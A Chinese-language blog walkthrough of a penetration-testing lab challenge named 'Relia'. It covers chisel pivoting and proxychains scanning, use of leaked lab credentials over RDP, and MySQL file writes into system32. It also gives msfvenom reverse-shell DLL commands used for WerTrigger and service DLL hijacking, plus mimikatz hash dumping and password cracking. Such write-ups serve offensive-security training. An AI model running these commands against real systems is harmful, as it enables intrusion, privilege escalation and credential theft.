Challenge 2 - Relia(8)

 Challenge 2 - Relia(8)

下一台選定內網的機器 .8 來進行下一步的目標



上一章已經在 .191 搭建了 chisel,直接透過 socks 掃描 172.16.xxx.7 TOP 100 Port

指令,└─$ proxychains4 -q nmap -vvv -sT --top-ports=100 -Pn 172.16.172.7

可以看到有開啟 80 Port HTTP


nmap 掃描 80 Port 詳細資訊看看,發現是 WordPress 6.0.3

└─$ proxychains4 -q nmap -sCV -p 80 172.16.172.7 | tee nmap-80



再起一個 chisel 8090 Server,然後透過 .191 搭建 kali 8888 對應到 172.16.xxx.7 80 Port

wmic process call create "C:\users\jim\desktop\chisel.exe client 192.168.45.221:8090 R:8888:172.16.172.7:80"

開啟來看看 8888 /,看來伺服器轉址有寫死 80 Port



改搭建回 kali 80 Port,wmic process call create "C:\users\jim\desktop\chisel.exe client 192.168.45.221:8081 R:80:172.16.172.7:80"

再開一次 80 / 這一次有畫面了



點選相關連結發現有寫死 SNI "intranet.relia.com"



寫死 hosts 後可以正常開啟了



測試了幾組帳號密碼都沒有發現



後續測試 crackmapexec 發現 michelle@relia.com:NotMyPassword0k? 憑證有效

且 RDP 直接顯示 "Pwn3d!"



RDP 測試登入,└─$ proxychains4 -q xfreerdp /u:'relia.com\michelle' /p:'NotMyPassword0k?' /v:172.16.172.7,直接進去了,桌面上直接放著 local.txt flag



whoami /priv 沒有甚麼權限



搭建 chisel MySQL 到 kali,執行 select load_file('C:\\\\users\\administrator\\desktop\\proof.txt');

直接讀到 proof.txt 了,看來 MySQL 權限夠大



標準作業先建立 phoneinfo.dll

└─$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.221 LPORT=4444 -f dll -o phoneinfo.dll



將 phoneinfo.dll、WerTrigger.exe、Report.wer、上傳到 .7



MySQL 將檔案存到 system32 底下,select load_file('C:\\\\users\\michelle\\desktop\\phoneinfo.dll') into dumpfile 'C:\\\\Windows\\system32\\phoneinfo.dll';



檢查一下確認已放好



執行 WerTrigger.exe 成功拿到 4444 Reverse Shell,whoami 確認是管理者



再拿一次 proof.txt flag



更新攻擊列表



繼續在 .7 進行枚舉,執行 mimikatz.exe 獲得 michelle 的 HASH



.7 本機 Administrator 帳號的 NTLM HASH



網域帳號 andrea 的 NTLM HASH



hashcat 破解獲得網域帳號 andrea 的密碼是  "PasswordPassword_6"



更新帳號密碼表



在 RDP 進去的 session,使用者是 michelle 的一般使用者下有發現另外一個疑似可以提權的作用

前面我們用了 phoneinfo.dll 然後透過 MySQL 的方式提權,接下來來看看這個利用可否成功

C:\ 底下有個資料夾 Scheduler 裡面有兩個檔案 scheduler.exe & customlib.dll



匯入 PowerUp.ps1,執行服務列舉 Get-CimInstance -ClassName win32_service | Select Name,State,PathName,確實發現該路徑的 scheduler.exe 是個服務,名稱叫 Scheduler



看了一下服務的啟動是用 administrator 去跑的



看了一下兩個檔案的權限,現有使用者都只有讀取與執行的權限



測試服務可否停止再啟動,發現現有使用者可以正常停止與啟動



將檔案 COPY 到 WINPREP 啟動看看,發現無法正常啟動



註冊一個服務取名叫做 "lab2-7",sc.exe create "lab2-7" binpath= "C:\Scheduler\scheduler.exe"

用指令 net start lab2-7 就可以正常啟動了



過濾 Process Name,Result 是 NAME NOT FOUND,PATH 結尾用 .dll 查看



發現在同路徑 c:\scheduler 下會去查找一個 dll 檔案,名稱叫做 beyondhelper.dll





建立 beyondhelper.dll Payload,msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.221 LPORT=4444 -f dll -o beyondhelper.dll



上傳到 .7 的 C:\Scheduler 路徑



重新啟動服務,拿到 Reverse Shell 了




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)